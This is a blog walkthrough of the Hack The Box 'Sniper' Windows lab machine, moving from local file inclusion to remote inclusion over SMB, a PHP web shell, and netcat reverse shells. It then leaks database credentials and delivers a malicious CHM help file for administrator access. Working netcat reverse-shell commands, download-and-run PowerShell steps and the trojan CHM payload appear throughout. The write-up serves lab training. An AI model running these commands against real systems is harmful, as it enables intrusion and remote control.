Hack The Box Sniper Writeup and Detailed Walkthrough -10.10.10.151

Hello, today I’m publishing the writeup and walkthrough of Sniper Windows machine 10.10.10.151 in my HackTheBox writeup series.

The Sniper (10.10.10.151) windows machine is the number of vulnerabilities including LFI (Local File Inclusion) and possible RFI (Remote File Inclusion). So let us get started.

NMAP SCANNING

As always, I’m going to add machine IP address 10.10.10.151 to my etc/hosts as “sniper.htb”. In the next step I will initiate the nmap scan.

Result:

 ⚡ ⚙  root@ns09~/htb/sniper nmap -sC -Pn -sV -oA nmap.txt 10.10.10.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-16 16:46 +03
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.25% done; ETC: 16:49 (0:02:45 remaining)
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.68s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-12-16T21:47:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.16 seconds
 ⚡ ⚙  root@ns09 ~/htb/sniper master ±

nmap revelead there are a few ports open. The webserver t port 80, port 135, port 139 and SMB at port 445.

Webserver Enumeration

Lets look in to the website hosted in the port 80.

After a manual enumeration, I found the language selection option in the blog (http://sniper.htb/blog/index.php) “about us” page. Eg: http://10.10.10.151/blog?lang=blog-en.php. So this is where I’m going to concentrate as the link blog?lang=bog-en.php seems to be LFI vulnerable. I will as well confirmed if the machine is vulnerable to RFI, I started my Python Webserver and call it from the link, but its failed.

LFI ( Local File Inclusion) to RFI to Reverse Shell to User.txt

As I confirmed the RFI is blocked, I need to bypass the RFI restriction to get inside the system. There are several ways, I’m going to use the IndiSHELL way to bypass the restrictions. Before that I’d confirm the LFI still a thing in this box, but how?, follow me…

I sent a Burp requests with the modified header. The new header included with a payload requesting contents of Windows System hosts file (WINDOWS\System32\drivers\etc\hosts). After running the Burp request I have successfully read the contents of the hosts file, see below screenshpt.

As the LFI vulnerability on this box confirmed, my next task is to convert this LFI to RFI so that I could connect the box from external connection and get the reverse shell. As I mentioned above the IndiSHELL guys published a cool method for this, let us get the shell using it.

I cleared my current Samba configuration (/etc/samba/smb.conf) and setup as per IndiSHELL configurations and bitof my knowledge, the final config file looks like the below. And restart the Samba service

echo > /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[nav1n]
comment = Sniper Reverse Shell
path = /root/htb/sniper/www
guest ok = yes
browsable = yes
create mask = 0600
directory mask = 0700

Now that my Smba share is up and running. I going to copy the PHP shell (https://github.com/WhiteWinterWolf/wwwolf-php-webshell) in the Samba directory.

Running The PHP Shell

Everything is now set up correctly. Let us go to the Sniper website and add the following to LFI URL: \\10.10.14.4\nav1n\nshell.php

Testsing the PHP Shell:

Ok, everything looks working perfectly. But I’m still unable to run the reverse shell, for that I need to uplaod netcat (nc.exe) in to the Sniper machine. I was not able to upload the nc.exe to root C:\, so lets create a subdirectory inside the C and upload there.

I upload the nc.exe to my nav1n directory successfully.

Getting The Reverse Shell

Now the netcat is in place and waiting for my command to run, I’m going to run the listner in my local Kali machine. The command: nc.exe -e powershell 10.10.14.4 8888, I now have the reverseshell as iusr.

After a little recon, I found a PHP file called db.php which contained a credential for a dbuser.

dbuser:36mEAhz/B8xQ~2VM

But after looking at the users of the machine, I understood that there is a user called “Chris” and we need to Privesc as Chris to get the user.txt

Privilege Escalation and User.txt

So far I have no idea what is Chris’ password, but I have a password from db.php file. I’m going to use PowerShell to credentials using the password I have.

password = “36mEAhz/B8xQ~2VM” | ConvertTo-SecureString -asPlainText -Force
$username = “nt authority\Chris”
$credential = New-Object System.Management.Automation.PSCredential($username,$password)
echo $credentials

Let us use the Invoke-Command to run the command as Chris.
Invoke-Command -ComputerName sniper -Credential $credential -ScriptBlock {whoami}

ANOTHER WAY TO ADD CREDS TO USER CHRIS

The following is another way to add Chris credentials both will give you reverse shell as Chris when you run the invoke-command.

$username = ‘sniper\chris’
$password = ’36mEAhz/B8xQ~2VM’
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username,
$securePassword
$s = New-PSSession -ComputerName Sniper -Credential $credential
Invoke-Command -Session $s -ScriptBlock { C:\nav1n\nc.exe -e cmd.exe 10.10.14.8 8885}

I tried to run the nc.exe but unfortunatly, I dont have permission to run it, access is denied.

So, I have another plan. I will run the Python HTTP server locally from my Kali and run nc.exe from there. I will have my local webserver share the nc.exe and copy it to Chris’s desktop using the script-block.

Command to use: {cd C:\Users\Chris\Documents\;$url = “http://10.10.14.4:8088/nc.exe”;$output = “C:\Users\Chris\Documents\nc.exe”;Invoke-WebRequest -Uri $url -OutFile $output;dir} – replace it on {whoami}

And the nc.exe is successfully uploaded to Chris’ Documents.

Now I need to set up another listener to get the reverse shell as Chris. The script block command to get the reverse shell is {cd C:\Users\Chris\Documents\;./nc.exe -e PowerShell 10.10.14.4 8884}.

After running the above script-block, I immediately got the reverse shell as Chris in my new listener.

User.txt

Privilege Escalation Part 2: Journey Towards Root

After a brief recon, I found a CHM file called “instructions.chm” ( Compiled HTML file – windows help file) in Chris’ Download folder. Since the extension is very interesting, I as well found another interesting text file “note.txt” in C:\Docs.

The CHM file is normally used by Microsoft or any 3rd party Microsoft vendors to record help of a particular program. If you visit any installation folders of Windows program you will at least find 1 chm file that normally has the help of the respective application. The CHM exploit was in news for a very long time now. The Hacker can exploit the vulnerable CHM file and he is able to run arbitrary Remote code execution as Administrator.

Some CHM Exploits:

C:\Docs\Note.txt

The text file note.txt in Docs folder has a message to Chris from the CEO of the Sniper Co. The text file reads:

Hi Chris,

Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you’ve prepared the documentation for our new app. Drop it here when you’re done with it.

Regards,
Sniper CEO.

I manage to download the instructions.chm file and it reads like this 🙂

Well, as always, the rogue employee very dangerous, if you have a rogue employee in your IT department or backend development, I believe you are scr****d. The employee intentionally left the vulnerable CHM file in the document folder and he wanted someone to exploit it using the hidden payload and exploit the Server – presumably the CEO himself!!!

Let us be that “SOMEONE” and teach a lesson to that dumb CEO. The CHM can be exploited using Nishag’s Out-CHM.ps1 (https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) PowerShell exploit.

Creating A Malicious CHM File

Note: The antivirus and Windows Defender will block the CHM file saying it as a virus, so I suggest you use it in a virtual environment with all type of security blocked, make sure the defender is turned off. If your current AV has an option to allow, you can as well manually allow the script.

I download the script from this GitHub repo to my Windows machine and import it as a module.

In the next step, I will create a CHM file with a malicious payload. The command I run is as below:

Out-CHM -Payload “cd C:\Users\Chris\Documents\;./nc.exe 10.10.14.4 8877 -e powershell” -HHCPath “C:\Program Files (x86)\HTML Help Workshop”

The command created a CHM file called doc.chm in my current directory (Desktop). I moved it to my Kali machine and upload it to Sniper machine using Simple Python HTTPServer. I use the same command which I used to upload the nc.exe in the previous step with a small modification.

Setup your Listener

Now its time to setup my last listener before I get the Administrator. The listener in my case is the one attached to my malicious CHM file (x.x.x.x 8877)

A working command to download the malicious doc.chm file: Invoke-Command -ComputerName sniper -Credential $credential -ScriptBlock {$url = “http://10.10.14.4:9999/doc.chm”;$output = “C:\Docs\instructions.chm”;Invoke-WebRequest -Uri $url -OutFile $output}

So when CEO open the CHM file, my listner activated. It still says Chris/Documents, but WHOAMI shows I’m administrator. I read the root.txt without wasting a minute.

Thanks for reading. Come back for more soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
5 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
anonymous
anonymous
6 months ago

This box was a real pain in the ass. How did you manage to download the instructions? The box was pretty tight

anonymous
anonymous
6 months ago

How do you retrieve the instructions.chm to your machine and view the chm inside, mine said it was corrupted and cant be opened or manually reverse engineered

Sorry, that action is blocked.